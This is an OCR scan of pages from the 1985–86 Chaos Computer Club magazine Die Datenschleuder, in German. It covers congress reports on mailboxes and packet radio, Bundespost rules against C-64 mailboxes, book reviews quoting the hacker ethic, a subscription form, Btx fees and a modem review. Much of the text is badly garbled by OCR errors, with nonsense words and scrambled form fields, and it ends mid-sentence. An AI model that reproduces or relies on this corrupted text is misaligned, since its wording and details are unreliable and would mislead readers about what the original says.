zu berichten, waren eifern einqe Teilnehmer dci
imerikinlzcnen Netzwerke« "DelphiNer »nfe-
reist
Sie benuben das Nebwerk für On-Line-
Konlerenten und ak ciektronitche Zeitunj. fln-
wendunfsbeispieb Bei einer USfl-weilen flnti-
ßpartbeiU-Demonilration fand man die akUieD-
«len Infos im “ Delphin et". W ann wowie demon¬
striert wurde, konnte man überdas Netz abrufen.
-On-ime-IConferenzen zwischen den lokalen
Koordinatoren »rilen für aufeinander abfe-
itimmte Aktionen. Nach Aussafen der Ameri¬
kaner lind Compuiei-Konferenzen fefenüber
Telefon-Konferenzen
a) hillker (csl ein Uierlel der Kosten)
h)effe!ctiuer(l. uenucht nicht jeder dweh lautes
BniOen das U ort an sich zu reißen, 2. kann man |
nochmals nachlesen, was kurt zuvor fesaft wir-|
de üst ja noch auf dem Schirm) 3. reden nicht
alle durcheinander). Außerdem kann das
Konferenz-Protokoll anschließend ausfedruckt
und an Nicht-Teilnehmer uerteili werden,
delphlwi 851228 D3:30e
Hund SHmma scho
Auch ln dititn Jihr uutift CCC Muf dun
KKK von tüt B.H.P. hfs (= heimiesucht). Dw
Beratunf Island für den lebensbejaJienden DFÜ-
Benutzer war ein voller Erfolf. Nicht nur, daß
die vereinifte Hackerschaft uns vntesvn alten
Müll aus den Händen riss - nein, auch einen
neuen Rekord fab es zu vermelden: NurH Tafe
nach der Auslieleninf der B.H.P. Nr.£ erbHckie
mit nur 6 Tafen TrafzeH die B.H.P. Nr.7 das
LicblderU elL Dasterienmäßife Klonen erfolf-
te dann mit dem Kopierer im (chaotischen)
Archiv. UohlfemarkI, es bandelt sieb hierbei
um KEINE Behelfs-oder Sonderausfabe, son¬
dern eine tanz normale B.H.P..
Am Stand wurden leilwelse heiß sakrale The¬
men, wie der Zusammenhanf zwischen redak-
tfonelJem Weißbierkonsum und Erschetnums-
weise der B.H.P. diskutiert, ak auch weltliche
Dinfc, so das Dalen-Ver-und EntschHlsselunes-
verfanren DES (Data Enci^ption Standard) der
NHS (Halbnal Securltii Afcncy) besprochen.
Im Zusammenhanf mit dam Immer aktuellen
Dalenschvb war«« die SpekdxrHiif wo«
BctteLke^ und AboneaUadaWn dar B.H.P. und
Alternativen zum (kimputer, wie R ückfaD in db
Karteikasteniiil (iminUrassaat) od«* «orWio-
tete U mschläfe für jeden flhoimentzn (Beispiel
Handbvch fir H ackW) Inhalt ke^ Diskvssio-
nen. Wer eine Diskette dabei hatte, konnte sich
im Hack-Center ileich die B.PLP.-f reeware ab-
ziehen. Ein VlRUS-f roframmfl^onzepl für den
C-64 entwickelt (hebe!!!) und die Zusammenar¬
beit zwischen B.H.P. und andaen Gruppen
(CAC,Grs etc.) abf «prochan.
bhp.us 851228 D5;a7e
A.U.G.E.
Am Samslaf 15.00 Uhr bnd ein Tr e ffen von
Sus Op' s der lokalen MaiEboxen mnerhalb der
Auge (Apple Ueer Group Europe) statt Ze-
nächsl wurde der aktuelle Zastano beschrieben:
eine zentrale Daiex-P MsülbaK binerhaib von
IM CA (Geonet) und lokale Mailboxen in Frank¬
furt, Oberbausen, M annheim, Hamkwrf, Darni-
stadl und Köln.
In Zukunh soll ann ein Iniormitbnsaaitanseb
iwischen allen lokalen Mailboxen itattfinden.
Er wird sofort über einielne User der IMCA
yerwrklicIrL Ein echtes Internailinf zoll später
in Zusammenarbeil mtt anderen Boxen entste¬
hen. Die Koordinatian dieser Aktivitäten EiuH
über die Rcfbnalfnippe Hatnburf.
auf^ws äl228 Dfjl4e
HPRCSSUM
InformationshbU tum
Chaos CommunikatiDn Conprest
Pressestelle des CCC'S
Druck:
Eifendntck im Selbstverlai
RedaktioTi:
Medfenworkshop des CCC'SS
Mltarh eilende Redaktionen:
DaUnschteuder
Die Bayrische Hackerpost
GeneUiischer InformitiDntdienst
C-64 Anwender Club
u.a.
U.LS.d.Pj
Herwart HoOand-Morüz
Schwenckestr.fß
2D00 Hamburf 20
Impress.wi 851226 4-.S6e
—I Freiheit isi lernbar
‘Coatpukr i* lic Ht*d lu Uolku“, das aai(
1S7( aocli ab rtmluioBSrct- Satz. 198$ iil der
HtiBcoaputtrauirkt k<l gcaälSsri
Die einen Minen twar, wie de mit der Compu-
fcrleclinik Hcrrtchah abtichem und erweiim
Vönnen, andere dafteen empfinden erhabene
Gefühle, wenn ex nach nonaUn felinyt,f1 uUert
HauihalUkasxe auf dem C’64 zu Implementieren.
Uber allem wabert ein irrealer Compulo-mpthoi
' er umfibt nlhrt denjenifen, der nur vor|iht,
etwai von ihr m «cnichen, mit der Aura det
Erleuchte teil
lildießnetl vor dem Computer ein Eriiehunyt-
mütel für na^nfesellschzften? Abo, ‘wenn ihr
nicht arti; leid, noU__euch dax froße tchwarze
CamvulerunieheueH‘
Auf dem CCC'85 wurde deutlich, d^ die Uer-
netzuni von Mikrocon^utem die rerxnektiue
einer lokal autonomen GexeUxchaft durch kikal
autonome Technik in ikh fanl Aber die Netze
entstehen in den Köpfen der H enschen - sie sind
ein W djenxakl - keine Fraie (echnbeher Reah-
sierbarkeiL Ohne soziale Zuammenhiinj e, ohne
femeinsame Inlerexsen und Ziele wird ein alter¬
natives Computemetz tum Btn dMenerieren.
Untere Hebe brauchen ‘telUame , konsequent
subfekUue imd poetische Inbirmatianen - ein
spannender und menschlicher Kontrast zu bv-
rokratitcken Oatenneben.
Deutsche Hacker, Dichter, Denker. Jede phüo-
nphbehe Schule bl teil dem Altertum auch
immer eine Denkiormabervni fewesen. Unsere
T ormalienjnien sind rein techniscW Natur. D ie
Gedanken im Heb sind frei Freiheäist lernbar.
Die Freiheit, db wir anbielen, bl die des Intor-
maliontutries. Eine leidenschaftlich lestellte
Frafi bt to Ubenswari wie eine verbindliche
Antwort
in diätem Sinne verstehen wir auch Schuluns-
sproframme fürNehwerker NachbarschaftshU-
fe im fiobalen Dorf statt Schult der Nation.
Praktisch: der Anbieter eines Schuhinispro-
J rammes weiß, d^ seine Schüler heute ssbon
essere Lbtunien rinden können.
Die Au^abe des Nebwerkers bt, sein Wissen
und seine Technik anderen Nichl-Computer-
Fachleufen weiter zu feben. Nur to laßt sich der
(be-)herrxchende Compufermuthos auflosen.
Niemand toQ seinen Computer küssen. Nebuer-
ke sind menschlich,
medbn.wt 8SI223
1
Luftige Da fe n mit Pocket Radio
Standif umlaseri war die Funkmailbox DL 0
CCC-1 auf dem CCC’85. M K 1200 Baud macht
sie Datex im Luftverkehr. Die benutzte Norm
bl AX25, die flmaleurfunkuertion von X.2S.
M ii Ihr kann jeder Funkamaieur weltweit adres¬
siert werden. Beider Postnorm X.25 können die
Datenpäckchen an höchstens 256 Empfänser
adressiert werden. Uberlra|unjstehler wertlen
wie bei Dalex X.25 erkannt. Auf 144i7S MHz
war die luftise Box wäihrend des CCC'SS fast
ztandiz in Betrieb.
Emfcsebl werden au)^ “Pockercomputern
mH anzMchlotsenem 7311-Modem und rlsnd-
funkeetliche C64er mit wild anjebiuter Technik
sowie die üblichen Sonderaufbauten. Ab Stan¬
dard exfctieren KompIelÜösunjjen für CPM-
Kislen und C64er ab laufende rrolotypea Die
Pbtinen werden jejenwirtij in Hamhurj enl-
flochlen. Neben dem UK W -Bclrscb zibt cs auch
weitreichende Dalenverbindunjen auf Kurzwel¬
le; oft in 300 Baud.
Ein Besucher aus den USA stellte eine Dalen-
funkverbindun; über Kurzwelle zwbchen USA
und Nicarafua vors die Telefonverbindunfcn
sind zu unzuverlässif. Is5
packeÜ5.ws 851228 2209
' Ebi Uideo über den Konzreß wrd vom Stadt-
joumal erstellt und ist über
stadtioumal hamburz rulschbahn 17
' 2000 hamburs 13
teL040A46279 für ca. 30.-zu bestellen.
MailloxsofWare, die zu einem froßen Teil den
IM CA/Geonel-Befebhsalz verwendet und in
Turbo zeschrieben ist, ist zur Zeit im Apple-
Format (35 o. 80 Track) erhalllich. 140 KB
Sourcelext für 75.-.
Infos unter 061517784158 von 01 -1 9 Uhr.
schnipsc.Ms 8S122805:33e Seite 12
MAILBOXEN SIND NICHT TOT¬
ZUKRIEGEN
auch wenn die Posr es versucht
An olle User, Hocker, Cracker und DFÜ-lr^leressierlen... Es
geht um Eure Boxen und die neusten Akfivilöten der Deutschen
ßundesPOST! War die Datenfernüberlrogung (DFD) noch bis
vor kurzem das Privileg von Firmen, Wissenschoflern, Stoalsor-
gonen und einer finanziell begüterten Minderheit, hot sich dies
im Loüle der letzten Jahre dank stark gefollener Hord- und
Softvi70re-Preise mit verbesserten Geräten und deren zuneh¬
mender Verbreitung stark geändert! Vor ca. 2 Jahren kamen bei
uns elektronische Briefkösten für JEDERMANN — die ersten
Mailboxen — ouf. Es werden ständig mehr. Zumeist war Enthu¬
siasmus und Liebe zum Hobby sowie die törichte Idee, Gebüh¬
ren zu sparen, der Anlaß, SysOp zu werden und so ein Medium
ln die Dotenwelf zu stellen. . . Verdienen tut doron nur die Post:
der Betreiber muß ständig investieren und die Anrufer vertele-
fonieren. co. 2-3000 DM pro Monat. Do diese Mailboxen, wie
unoufkvendig sie auch immer sind, Kosten verursochen und wir
keine Millionöre sind, mußte der benötigte Rechner verbreitet,
preiswert und flexibel sein — wie der Commodore C- 64
(.. .oüch wenn einige onderer Meinung sind)! Desholb laufen in
Oeufschlond etwa 90% der co. 200 privaten Boxen auf C-64 mit
1541 Floppy. Nun kommt des 'Bonner Pudels Kern : Der 64.er
besitzt zwar eine Funkstör-FTZ-Nummer, ober nur eine serielle
TTL-SchnIttstelie.
Im Laufe der Zeit drang die Kunde von einem sogenannten Mo¬
dem an die SysOp-Ohren. So ein Gerät ermöglichte neben dem
Abnehmen eine wesentlich bessere DotensicherheitI Also,
nichts einfacher als das — besorgen wir uns so ein Modem.
Aber, oh Schreck, man gibt uns keins, denn unser Rechner hot
doch keine FT2- Nummer (plötzlich braucht er die nämlich)!?!
Ironie des Schicksals; die meisten F72-geprüflen Koppler arbei¬
ten auch mit RS232-PegeIn. Nun gibt es jo aber gottlob immer
noch ein paar Stellen, die ähnliches ( manche behoupten sogar
besseres) wie die POST onbiefen.. , Dos Zouberwori hiess DA-
TENKLO. Das Dotenklo (oder ähnliches) konnte genau das wos
ein POSTmodem auszeichnete — und noch ein bißchen mehr.
Gesagt — gekauft — installiert. Von nun on kloppte dos mail-
boxen In Stodt und Lord ganz gut und die POST konnte ständig
wachsene Gebühreneinnahmen verbuchen. Alle waren zufrie¬
den — bisher!!!
Dos scheint sich allerdings nun schlagartig zu öndern! Urplötz¬
lich sprengen diese Maiiboxen angeblich die POSTeigenen Ge-
rotschoften offensichtlich reihenweise...
Der C-64 muss sich zu einer Art SS-20 in der Dafentechnik ge¬
mausert haben und ein Dotenklo scheint es in seiner Wirkung
mit Hiroshima aufzunehmen. Die Schäden im POSTolischen Ka¬
belwold müssen verheerend sein!
Dos Btx-Moderr DBT03 poßt mit einer Vierdrohtverbindung on
den C64. Erloubi ist dos ober erst noch der neuen TKO co. 1988.
Die vormols kotserlich-joponiscKe Post hot den Sprung zu Tele*
Icrotie schneller geschoft. Seit rund einem Johr dorf on joponi-
sche Postdosen so ziemlich olles ongeschlossen werden. Houpl-
soche, es geht nichts koputt. Hier wird es, wie unser Postminister
ouf der lntermedio85 vortrug, noch Johre douern. Man holte
gerode erst neue Untersuchungen in Auftrog gegeben. Solonge
bemühe sich die Post um Flexibilität in der erworteten Richtung.
Der juristisch korrekte Abstand zwischen DIN-Sfecker und der
hoheitlichen Anschlußdose im ISDN-Formot (dos einzige, was
von Bix bleibt) Ist deshalb in Jahren der Toleranz bis zur Frei¬
gabe zu bemessen. Solonge liegt der Stecker aus Sicherheits¬
gründen mohnend daneben.
Viele der neuern Postmodems (nicht nur dos DBT03) hoben kei¬
ne ordnungsgemässe V24 (RS232-C) Schnittstelle. Damit erge¬
ben sich Unwägbarkeiten bei der POSTolischen Zulassung —
der FTZ'Nummer. Dos ist diese toto! unumgängliche Prüfnum¬
mer für so hochtechnische Geräte wie z.B. eine Telefonsteckdo¬
se usw.. Ein FTZ-geprüfter Koppierdorf an eben diesem Rechner
betrieben werden (Grund: der Rechner würde bei Fehlfunktion
nur den Koppler, nicht ober das Welttelefonnetz zerstören) -
man muss nur 24 Std. täglich neben seinem Rechner sitzen und
auf Telefonanrufe der User lauern, dann blitzschnell den Hörer
hochreissen und ihn geschickt in die dofür vorgesehenen Gum¬
mimuffen des Koppler bugsieren...
Mit mehr oder minder schlechter Oberfrogungsquolität konn
dann der Dotentronsfer durch die modernen POSTIeitungsnetze
(teilweise noch vor 1938 verlegt) beginnen. Nun hatten einige
dieser Mailbox- Betreiber ober nach einigen Togen und Näch¬
ten des unermüdlichen .Durchwachens om Rechner den Wunsch
nach Abhilfe! Besonders findige Köpfe bauten kranorfige Ge¬
bilde, die obenleuerliche Hebemechonismen in Betrieb setzen,
die die Arbeit des Hörer Abhebens usw. mehr oder weniger ge-
schiclctousführen. _ . .
Seite
Denn in jüngster Zeit fauchen bei ollen möglichen Mailbox-Be¬
treibern Bedienstete von Herrn Schworz- Schilling ouf und neh¬
men unter Bezug auf die gültige Fernmelde-Anlogen- Verord¬
nung (sie hier zu zitieren würde mehrere KByte Speicherplatz
kosten) eben diese Boxen ausser Betrieb! Letztes Beispiel:
M.C.S. Homburg, eine der ältesten Boxen in Deutschland über-
houpt. Hangit es sich doch um eigenmöchtige Eingriffe und
Veränderungen POSTeigener Apparate...
(Remark: Wer also sein Telefon mit einem nicht FTZ-geprüften
Aufkleber versehen sollte macht sich nach Angoben vieler Post¬
ler strafbar — xx) Die Kunde von solchem Handeln der Behörde
oder wor es doch nur ein Dienstleistungs-Unternehmen, kommt
nun aus allen Teilen der Republik in rapide steigender Zahl. Der
nette Vorschlag der Beamten zur Abhilfe loutet ungefähr so;
"Schicken Sie doch einfach Ihren Rechner nebst einer nach unse¬
ren Richtlinien gebauten RS 232-C Schnittstelle zur Einzelab¬
nahme on die FTZ- Vergabestelle nach Stuttgart. Dort stellt man
dann schnellstens nach ca. 6 bis 9 monoliger Prühjng und gegen
eine geringe Gebühr
eventuell eine Einzelgenehmigung zum Betrieb mit einem bei
uns gegen Gebühr leihbaren POSTmodem (DM 80,- /monatl.)
aus! Eventuell ist dieses Modem dann sogar vorrätig!” Wirklich
sehr hilfreich — oder???
Wir fragen nun Euch, die User, Hocker und Datenreisenden,
muss das so sein und ist dos wirklich olles richtig so!?! Koum gibt
es ein neues (im Ausland schon lange vorhandenes) Medium, so
fühlen sich offensichtlich auch schon wieder einige höhrer
Beamte um ihr Monopol betrogen. Es gibt jo schliesslich auch
noch TELEBOX von der DBP, rür gewerbliche Anwender ge¬
plant. Leute die aus Spass an der Soche und ohne Kosten für
andere Ideen verwirklichen sind dort aber ouch nicht gefrogt.
Einige fürchten MÜSSEN DIE MEHLBOXEN SO SCHNELL
SCHON WIEDER STERBEN? Aber die Mehlboxen sind ein klei¬
nes Sfücic Freiheit und Freizeit und verbreiten siche eher wie ein
Virus mit West/Osl-Gefällel hCI0785 Sy/RAMses
13 melboxlS.ws 860323
Buchbesprechungen
Datenschieuder
15 = März 1986
9^'
^^^XEDBZQBZZ^ ,
101 Money-saving secrets Your
Phone Company Won't Teil You
101 Money-SavIng Secrets Your Phone Company Won’t Teil
You
"Writfen in the some irascible style os Teleconnect Mogozine
(CQ41-113) which Newton publishes. 101 Secrets is mostley
about cutting your phone expenses without losing ony Service.
Some of the melhoas are Mochiavellian — deliberotely mess up
the quolity of your phone lines, for instonce, so your employees
spend iess time on the phone." schreibt Art Kleiner in der Whole
Earth Review Winter 1985 über dos Buch von Harry Newton
1983.94S..ca.lOUS§
Hackers Steven Levy
Warum der Chef, der ins Telefonsystem seiner Angestellten
eine sich oulomotlsch bet Privatgesprächen einscholienden
Störsender etnbout, kein Hocker ist, geht ous dem folgenden
Buch hervor.
Hackers
Dos Buch von Steven Levy war eine Art Grundlagentext ouf der
US- "Hacker's Conference 84", deren Ergebnisse ob Seite 23 in
der Hackerbibel unter dem Motto KEEP DE5IGNING beschrie¬
ben sind. Eine ousführllche Besprechung soll folgen, hier nur ein
paar Zitate zum Thema Hackerethik:
’l. Zugriff auf Computer und olles Wissen, was Dir hilft, Vor¬
gänge auf der Welt zu versthen, muß uneingeschränkt und um¬
fassend sein. Das Prinzip des Mitmachens gilt überall.
2. Alle Informotionen sollten gratis sein.
3. Mißtraue Autoritäten — fördere Dezentrolisierung.
4. Beurteile Hacker nach Ihrem Handeln, nicht nach überholten
Kriterien wie Diplomen, Alter, Rosse oder Stellung.
5. Du kannst mit dem Computer Schönheit und Kunst produzie¬
ren.
6. Computer können dein Leben positiv andern. {Ich denke, daß
wir ohne Computer besser dron wären. Da sie aber in dieser
Zeit wichtig sind, muß ich verstehen warum. Der sAtzer)
(1984,458 S., ca §17.95, Doubleday and Company, 501 Franklin
Ave., Garden City, USA-NY 1153.
Die Lieferung on uns dauerte vier Monate und kostete etwa 90
DM.
Besser ist Anfrage an
buchbel 5.ws 860323 Ou^
The Computer Underground
The Computer Underground.
Computer Hacking, Crashing, Pirating and Phreoking by M.
Horry.
LOOMPANICS UNLIMITED, der Verlag für kontroverse und
unübliche Bücher mit Widmung an dos zweite Houptgesetz der
Thermodynamik hot ein neues Buch herausgebracht.
Zwischen Widmung "Dedicated To: G. Jones. Thonks for oll the
times you baiied me out" und Quellenhinweisen eine Pulle von
Information. Noch der Introduction finden sich die Kapitel Un¬
derground Bosics, The electronic Infornnation grid, Softwore
Pirocy, Phreoking, Security agoinst Computer Espionoge, De-
feating Computer Security, Hacking Networks, BßS'ing: Using
the Boords bis zurConclusion. Im Anhang Telephony, Computer
Hocking, Programme und Nummern.
Umfang hackerbibelartig, aber schlic ht schwor z weiß.
ISBN 0-915 179 31-6. Preis bei der hackerbibe¬
lähnlich bei CO. 8 Wochen Wartezeif.^^^^^^^
Johannes Gutenberg
Johannes Gutenberg.
In seinem Buch über Gutenberg schrieb Matthias Geske:
Gutenberg; "Ich will eine ßucnwerkslott begründen wie diese
hier. Die Menschen brauchen Bücher.,.
'Verrennt euch nicht!" unterbrach ihn der Abt schorf. "Ihr mögt
schon recht haben mit euren Überlegungen,... Ihr könnt nicht
beurteilen, was dem Glauben und der Kirche nützt.... Die Bü¬
cher, die wir obschreiben, sind sorgfältig ausgewählt. Soll den
der gemeine Mann om Wort Gottes herumdeuteln?"
Oer Autor hat den wenigen bekannten Daten über das Leben
Gutenbergs (aus Mainz verbannt, Schießpulverhandel in Poris,
Edelsteinschleifer in Straßburg) einiges hinzugefügt. Ihm gelingt
das Porträt eines unruhigen, aufgeweckten Mennes, mehr Er¬
finder und Entdecker als ßuchmensch.
Matthias Geske: Johonnes Gutenberg. 176 S., Pb. Ab 9 Johren.
onr(ch.lSBN3-89106012-2
/ws/buchb215.ws 860322 1934
Buch- Warnung!
MSDOS im Detail
Buchwornung: MSDOS im Detail.
Dos Buch erweckt den Eindruck einer umfassenden MSOOS-
Darstellung, die im Detail falsch ist. Der Haftungsausschluß im
Vorwort Ist begründet. Die 10 MB-Plotte, auf der diese Doien-
schleuder erstellt wurde, mußte aufgrund von Seite 33 neu for¬
matiert werden. ZItot; "Ein Störfall auf einer Diskette bzw. einer
Datei kommt in der Regel sehr selten vor. Sollte ein solcher Fall
allerdings eintreten, besteht die Möglichkeit, die Information
mit dem RECOVER-Kommondo zu berichtigen. ... Hinweis; In
allen RECOVER- Fällen gehen Informationen verloren. Hierbei
handelt es sich jedoch nur um Teilmengen einer Dotei bzw. Dis¬
kette."
Die bittere Wahrheit; Es sammelten sich nach dem RECOVER-
Lauf 6,7 MB wichtiger Daten in Null Dateien on. Auf der Plotte
gab es keine Directories mehr, nur 256 einsame Dateien voller
wirren Zeugs.
RECOVER ist der wohl gefährlichste MSDOS-Befehl, der noch
nur 256 Doteien obstürzen konn und außerdem olle Unterver¬
zeichnisse (Subdirectories) komplett in eine Dotei zusammen¬
faßt. •
Vor der Lektüre des Buches Ist zu warnen. P.P.VÖlzIng. MSDOS
im Detail, iwt. ISBN 3-88322-142-2
xi/ws/buchb315.ws 860323 1533 Sei "t B 14
m:-
Oatensch1euder Seite 15
15 = März 1986
Das wissenschaftliche Fachblatt Für Datenreisende
Ein Organ des Chaos Computer Clubs
Fn^fnbiMtt TEXlTFLL. L'iS It/lf; rj.atin hi
Bedarf jeit dyevieTv l-or'mh l at-.t. f nl: cihop i er har .
Redaktion Datenschieuder * Schwenkestraße 85 * 2000 Hamburg 20 *
Rechnung (nur <ni t Bi eqel ) .''n'est.el. 1 fetzen
ficL-imtsurg , RosttofTipel d.atum
rmit wird um t-rf ü 1 I. i.ing der j m folqenderi qt üchz at'i 1 iftalii y spezf i z i. c?r tefi
ztlich iinberect»::-nbar-f5r-i Wunscfien gctieteri .
Beiträge zur Förderung des CCC
_cccvw 2ß, tOß DM_, Au f i'ialimBgertjühr (einmalig, Ve?rwaltung>
gei-jür-inch t p l...ei t s I: el 1 enriLurimer : _ )
CccFf ab 230 DM_,_Fordernde.^ Mitglied bis PS.2.B7
_cccNt 1.20,00 DM_,_Ncirfnaler?. Hi tgJ .i ecl biüi 23.2. £17
cccBI. 60,00 DM_,_Schüler u.ä. biin 20.2.87
_cccS0 2'0,00 DM_,_Schaler u.ä. biB 31.0.86
naturgemäß portofrei und unverpackbar
("han*?,—mit Behalt tag oder ru.chd
_dsP£ 2,50 DM_,_PrQbt?e:':en)pl ar d<n-atd;uel 1
Ein Abo bringt Unbekanntes öfter?
_dsLl 999,99 DM_, Leherisaljo ds (wer oder wa«; lebt langer?)
_dsFl ata 1.00 DM_,_Fnrdnrabo ß Ausgabe-n () Jalir )
_dsNl 60,00 DM_,_Jahresaho S A. Normal verdi«5n€*r
_dsSl 30,00 DM_,_Sonclerabo S A. NUR Schulter u.ä. ! ! !
_dsH0 60,00 DM_,_Sonderabo und Hackeyrbi bei Teil 1
dsPE-dsH0 jeweils inkl. Porto/Verp,
_dsHi 33,33 DM_,_HeckerL/.i bei Teil 1
_ dsKlÖ 3,33 DM _,_ je 10 Kleber CCC Kabelsalat spriwasge.
_ dsKCC 1,00 DM _,_ 1 Kleber Chaos Cnoten wasserfest
_dsAbta 3,33 DM_,_ 6^ Kleber Achtung Abhörge-fahr A4
(J.6?tztt3re sind z.Z. nicht lieferbar)
_dsKop --,33 DM_,_pro Btück Fotokopien aus dem Archiv laut
bei 1iegender Liste ( nur für Redakteure ).
Ich liefere deshalb:
Versand erfolgt -frühestens nach
Beldeingang.
With Inflation,
were an even betten buy!
Brtmarkn —,05 DM _,_ were an eve
Ör -fmarkn - , 50 DM_,_
Brfmarkn —,80 DM _,_ und in folgender Form:
sind zusamrrien
Alls rfordrlch btt sorgfltg ausflln?
Nchts wchtgs wglassn!!!
Wr habn sehn gnug zu tun mt Vrwaltngssche
Afas Datenschieuder 2HH20 C9927F
I Ausgefüllt am: !
< — fli er Adr essf: 1 eher be f- ust i gen
z we?i ten an heften ?. um Ver sch i cken
falls nlcl'i: mind. I DM Trinkgeld
Aufschlag für Mehrarbeit und
<— Adresse hier links lesbar
eintragen I
Hier DatumstempelplaLz für Verwaltung
_V_V_V_V_ v_
Auslieferung Archivierung Vernichtung
Formblatteingang Geldeingang
(*> Leitstol1enummer umfast mind. 4 Ziffern. Stelle 1+2 ist Tel-Vorwahl
HH 40, Berlin 30, KÜel 43 usw. Wünsche werden riach Möglichkeit erfüllt.
Hj^nburg
IM
Datenschleuder Sei te I0
15 = März 1986
I
•■I
ßtx-Oebakel
Zum 1. Juli will die POST die Speicher und Verkehrsgebühren für
das Blödeitexlsystem zu SO^/o erheben, verlautet aus dem Post¬
ministenum. Für den CCC bedeutet das, daß der jetzige Pro-
grommumfang mit über 2000 Btx-Seiten ca. 3000 DM pro Mo¬
nat kosten und dann nicht mehr über dos Spendenaufkommen
der BtX“ Seiten finanziert werden kann.
Neben dem CCC werden viele kleinere Informationsdienste —
sofern es sich nicht um Werbung oder Telefonsex (der Chef be¬
zahlt via Teiefonrechnungl) handelt — ihre Informationspro-
gromme sehr einschränken, in vielen Fällen gor oufgeben müs¬
sen, Dadurch wird Btx die derzeit wohl teuerste »Wunschma¬
schine“ (ED007).
Die neue Software, die eine Gebührenerhebung erst ermö¬
glicht, ist in einigen Punkten noch verbesserungswürdig. Zwar
gibt es ein neues Identifizierungsverfahrenj man benötigt für
jede wichtige Funktion ein neues Kennwort (ideal für Mütter und
Väter von fünf Kindern), jedoch geht die neue Version zu Lasten
der Vergütungsabrechnungen. Btx-Teilnehmer und Anbieter er¬
holten keine aktuellen Hinweise mehr über Ihr Gebührenauf¬
kommen, die Abrechnung geschieht monatlich (oder später).
Der CCC überarbeitet seit geraumer Zeit sein ßtx-Programm
nur noch zu oktuellen Anlässen. Der Club wird sein bisheriges
Programm zum 15. Juni löschen und ein neues Sparprogramm
mit circo 200 Informationsseiten anbielen. Um den Abruf, wie
bisher, auch von öffentlichen Geräten zu ermöglichen, werden
keine Abrufgebühren erhoben. Wir hoffen auf ein kostendec¬
kendes Spendenaufkommen über Industriegeröfe.
Mit Erstaunen wurde In der Btx-Redoktion das Informationsan-
gebof zu „Datenschutz und Datensicherheit" der POST zu An¬
fang März aufgenommen. Fachleute forderten schon vor ge-
roumer Zeit (ds3 März 84, HaSpa-Coup November 84), daß die
Post die Verbraucher oufklören muß. Verbroucheroufklörung
wurde von der POST vergessen. Die Werbestrategien wurden
fünf Johre im voraus geplant. Die Post zeigte hier eine Flexibili¬
tät, die jede andere Firma in döh Ruin getrieben hätte.
Den 40.000 ßtx-Teilnehmern kündigt sich ein ous Prestel-Zeiten
bekanntes Problem on. Mit Einführung der AlphoGeomefrie
(Graphilclevelj benötigen die Teilnehmer, die weiter Vorne (!)
bleiben wollen, auch neue Decoder. Die alten können Alpha¬
geometrie nicht dorsfetlen und lassen sich auch nicht umrusten.
Um diese Tatsache dem Teilnehmern noch zu verheimlichen
empfiehlt die POST Btx-Selten des neuen Standorts nur in ge¬
schlossenen Benutzergruppen anzubieten. Is23
btxlS.ws
Total Telecommunications
Einsteekmodem für den C64
Totol Telecommunicoflons
Einsteckmodem fürC64
Auch am DBP-Telefonnetz bewahrt sich dos TT-Modem für
unter DM 150. Die Anschlußstrippe entspricht zwar dem omeri-
konischen Telcom-Stondard, die mit deutschen Anschlußnormen
nichts gemein hot. Treibersoftwore gibts gegen Aufpreis, aller¬
dings nur eine mühsam aus dem amerikonischen odaptierte
Version.
Techn isch ist das Modem sauber aufgebaut, ohne exotische
Bauteile und recht übersichtlich. Der Userporlstecker führt die
wichtigsten Daten- und Steuersignale zum Rechner, als da sind;
RxD, TxD, DCD, Ring Indlcotor sowie ein Steuersignal zum An¬
schalten und Wählen. Erfreulicherweise wurde die Belegung so
gestaltet, doß das Modem sich ohne Probleme mit Sfnndord-
programmen wie VIP Term oder Vidtext benutzen laßt. Mail¬
boxnetrieb ist auch möglich (sollte ober wegen der POST unfer-
lossen werden), bei einigen Stondordprogrommen sind aller¬
dings Anpassungen nötig.
Leider beschränken sich die Obertrogungsfohigkeiten des Ge-
rötes auf CCITT V.21, also 300 Boud. mit automoiischer
Answer/Originate- Erkennung. Für Otto-Normoluser, der sich
auf die Datenkommunikation mit lokolen Telefonboxen be¬
schränkt oder eine solche betreiben will, ist dos völlig ousrei-
chend und dos Total Telecommunications Modem arbeitet hier
sauber und zuverlässig. Als Treibersoftwore wird vom Impor¬
teur ein Terminalprogramm angeboten, dos die Stondordfunk-
tionen bietet, nicht mehr. Allerdings ist die Bedienung elwos
umständlich, ein Untermenü jogt dos nöchste. und man verpoßf
leicht die wichtigen Funktionen.
Dies wird durch dos mehr als ousführüche Hondbuch ousgegli-
chen, dos auch eine recht gelungene Einführung in dos TT-fDo-
tenbonksystem bietet, welches ollerdings für bundesrepublika¬
nische User schwer erreichbar sein dürfte, da cs nur auf dem
nordomerikonische Kontinent prösenl ist.
Fazit: ein recht brouchbores und preiswertes Modem, wenn
mon gewillt Ist, sich auf 300 Bd zu beschrönken. Auf dos onge-
botene Terminolprogramm konn mon getrost verrichten.
Für BIM-kompatible Rechner liefert die Firma RESCO (Augsburg
0821- 524033) auch ein Modem mit V.24 Dose. Die zugehörige
Software {inkl, unter DM 200,-) kann komfortoble Mokros
abarbeiten und gestattet kennwo'-tgeschülzten Fernzugriff.
Totaltl5 860215 1358goblin
Dieser Hilferuf hallt durch manchen Operator¬
raum in den Rechenzentren unserer Welt.
Doch um Mißverständnissen gleich vorzube¬
ugen; ln den USA ist dieser Ruf etwas anders
zu Interpretieren als in diesem unserem Lande.
So bedeutet “Hilfe Hacker" in der BRD eifriges
Gelaufe mehr oder weniger kompetenter Per¬
sonen durch verwinkelte Gänge im Rechen¬
zentrum, faszinierte und/oder bestürzte Ge¬
sichter vor wild blinkenden Masterkonsolen,
schimpfende Putzfrauen, die sich durch Berge
von Printouts kämpfen und Hab-ichs-nicht-
gleich-gesagt Blicke frustrierter Betriebsräte,
bis einer auf die Idee kommt, den 220V-Reset
durchzuführen, der auch den hartnäckigsten
Hacker auf die Erde zurückholt (DATEX-P:
Ausloesung • Gegenstelle eingeschläfen).
In den USA werden Hacker mit etwas anderen
Augen betrachtet, wurde doch der Nutzeffekt
der Phreaks schon vor Jahren erkannt (Viva
Cheshire !), ja, die ersten Hacker haben eine
regelrechte Tellerwäscherkarriere hinter sich
und leiten jetzt diejenigen Konzerne, die die ja
so hackerfreundlichen Rechner der Nachfol¬
gegeneralion produzieren, ln Deutschland ist
so etwas momentan noch undenkbar, die li¬
berale Denkweise scheitert wieder mal am
Konservatismus. Gerade ein
{Kommunikations-)Entwicklungsland wie das
Unsfige sollte auch Denkanstößen aus Hac¬
kerkreisen Gehör schenken: es kann nur von
Vorteil sein, denn bei uns wären Hacker noch
billig zu bekommen (vgl. USA), wenn nicht
